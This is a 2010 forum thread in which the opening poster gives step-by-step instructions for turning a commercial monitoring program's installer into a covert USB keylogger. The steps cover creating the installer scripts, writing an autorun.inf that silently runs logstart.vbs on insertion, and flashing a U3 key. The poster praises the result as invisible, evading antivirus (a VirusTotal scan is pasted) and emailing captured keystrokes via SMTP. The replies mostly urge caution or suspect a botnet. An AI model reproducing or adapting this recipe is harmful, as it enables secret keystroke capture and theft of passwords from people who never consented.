lamer Posted June 11, 2010 Posted June 11, 2010 (edited) IMPORTANT NOTE: This project is for educational purposes only!!! The sofware used in here is completly legal 30 days trial from the original source. Because im relative new in this forum and i have very few post, some people may noy trust this project (and if someone used this is, it should be by their own risks, i recomend test this in a virtual machine before a real one, i will not assume any responsabilities for the wrong uses of this program or any activitiy related to it.) You have been Warned!!! Hi I know that this project is dead and old, but it is one of my favorites, and i was wondering if it is possible to add this keylogger that is undetectable to most of AV because it is a legal software, i have been using this keylogger without any payload, but i discovered that there is an option to install this to other machines making a script with the configuration needed (your account mail, invisibility, etc), and it looks very similar to the scripts of leapos-gonzor payloads, so it would be great to add this keylogger, because other keyloggers are knocked by most of AV or not work at all, and also this keylogger has the option to send data to your mail via smtp. The idea is to make it compatible with the payloads mentioned or even a stand alone installer keylogger from an USB. (installation is suposed to be invisible) Note that u have to configure your mail to work with smtp (i use gmail) NEW!! After a couples of probes i get it work by a stand alone keylogger with a simple autorun.inf, using a U3 usb key, with a very goods results and here is how, i dont pretend to make a step by step manual, because you can find the proces of customize an u3 all along the forum so i'll mark the main points only. here are the links to the keylogger working and tested FROM THE ORIGINAL LEGAL PAGE, i change the link because it was causing troubles of legal subjects and this isnt' the main priority of this post, https://www.refog.com/download.html http://www.refog.com/ you also need a u3 usb key, and Universal Customizer, i'll upload later, but im sure you can find it by the forum So here we go: First you have to install the software in a computer, i dont like this program in my own computer so i used a virtual machine for this purpose, once installed and with your full configuration click: file/create installer.../ and choose the folder to make the installer scripts, and now is the time to make it work from an USBkey, so you have to make an autorun.inf archive in the same folder of the installer with the next simple code: [AutoRun] open=wscript logstart.vbs icon=YOUROWNPERSONALICON.ICO and insert the icon you want to your usb in the same folder so you will have 6 archives -MpkNetInstall.exe -settings.bin -key.bin -logstart.vbs -loguninstal.vbs (i delete this because it seem pointless to me) -autorun.inf (with the code from above) -youricon.ico Now you only have to make an iso image with the program Universal Customizer, launch it and voila!!! you have an undetectable-invisible-mail sender-only1insert-usb keylogger!!!! I tested in windows xp completely invisible and in windows 7 just need to click in the icon to launch it (also a Virtual Machines, windows vista still dunno), with very scary good results, the only problem i found by now is that in another virtual machine (xp sp2) it mark a noisy non invisible installing error, and it seems to loop on every reboot, i will find why with more tests,, and the second problem i suposed will happen is that because we use a 30 trial demo it will stop working on 30 days, (for me is enough 30 days of continous logs for each computer) but i really dont know what will happen so we have to wait or get a legal registration :) Again and Again Use it by YOUR VERY OWN RISK, you dont have to trust me, but if you do please submit your results to improve this project, i know im still a "newbie", but i prefer to start with something interesting than post 1000000 useles coments (no offense to anyone, and hope everyone undestand me) enjoy!! meanwhile here is an analysis of it via virustotal.com: File mipko_employee_setup_604.exe received on 2010.05.10 13:10:35 (UTC) Current status: finished Result: 1/41 (2.44%) Antivirus Version Last Update Result a-squared 4.5.0.50 2010.05.10 - AhnLab-V3 2010.05.09.00 2010.05.08 - AntiVir 8.2.1.236 2010.05.10 - Antiy-AVL 2.0.3.7 2010.05.10 - Authentium 5.2.0.5 2010.05.10 - Avast 4.8.1351.0 2010.05.10 - Avast5 5.0.332.0 2010.05.10 - AVG 9.0.0.787 2010.05.10 - BitDefender 7.2 2010.05.10 - CAT-QuickHeal 10.00 2010.05.10 - ClamAV 0.96.0.3-git 2010.05.10 - Comodo 4813 2010.05.10 - DrWeb 5.0.2.03300 2010.05.10 - eSafe 7.0.17.0 2010.05.10 - eTrust-Vet 35.2.7477 2010.05.10 - F-Prot 4.5.1.85 2010.05.10 - F-Secure 9.0.15370.0 2010.05.10 - Fortinet 4.1.133.0 2010.05.10 - GData 21 2010.05.10 - Ikarus T3.1.1.84.0 2010.05.10 - Jiangmin 13.0.900 2010.05.10 - Kaspersky 7.0.0.125 2010.05.10 - McAfee 5.400.0.1158 2010.05.09 - McAfee-GW-Edition 2010.1 2010.05.10 - Microsoft 1.5703 2010.05.10 - NOD32 5101 2010.05.10 - Norman 6.04.12 2010.05.10 - nProtect 2010-05-10.01 2010.05.10 - Panda 10.0.2.7 2010.05.09 - PCTools 7.0.3.5 2010.05.10 - Prevx 3.0 2010.05.10 - Rising 22.47.00.04 2010.05.10 - Sophos 4.53.0 2010.05.10 - Sunbelt 6284 2010.05.10 - Symantec 20091.2.0.41 2010.05.10 WS.Reputation.1 TheHacker 6.5.2.0.277 2010.05.10 - TrendMicro 9.120.0.1004 2010.05.10 - TrendMicro-HouseCall 9.120.0.1004 2010.05.10 - VBA32 3.12.12.4 2010.05.06 - ViRobot 2010.5.10.2308 2010.05.10 - VirusBuster 5.0.27.0 2010.05.10 - Additional information File size: 7220632 bytes MD5 : 498b79b5ad1106b0401f90440b690f15 SHA1 : 8b3f4351987c6566e65b7370faa0a2cc2395815e SHA256: baa07e0d67efa4e8123329d270c8a9f3b8423ddd0a771e3a4611d06901c7d02e PEInfo: PE Structure information Please feel free to post your results Edited June 13, 2010 by lamer Quote
Jen Posted June 12, 2010 Posted June 12, 2010 Anyone who tests this, be careful. A poster with 2 votes posting something that's dangerous. Anyone who uses this should either run it in a vmware box or a sandbox, just in case Quote
Jen Posted June 12, 2010 Posted June 12, 2010 Isn't this warez? Supposedly this is for education purposes, so it shouldn't count as "warez" Quote
sablefoxx Posted June 13, 2010 Posted June 13, 2010 Warez is generally used to described cracked copyrighted software, since this is not a crack, nor copyrighted (by someone other then the poster) it isn't 'warez'. http://en.wikipedia.org/wiki/Warez Quote
brl1214 Posted February 18, 2012 Posted February 18, 2012 Not to mention good chance it's just a bot net. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.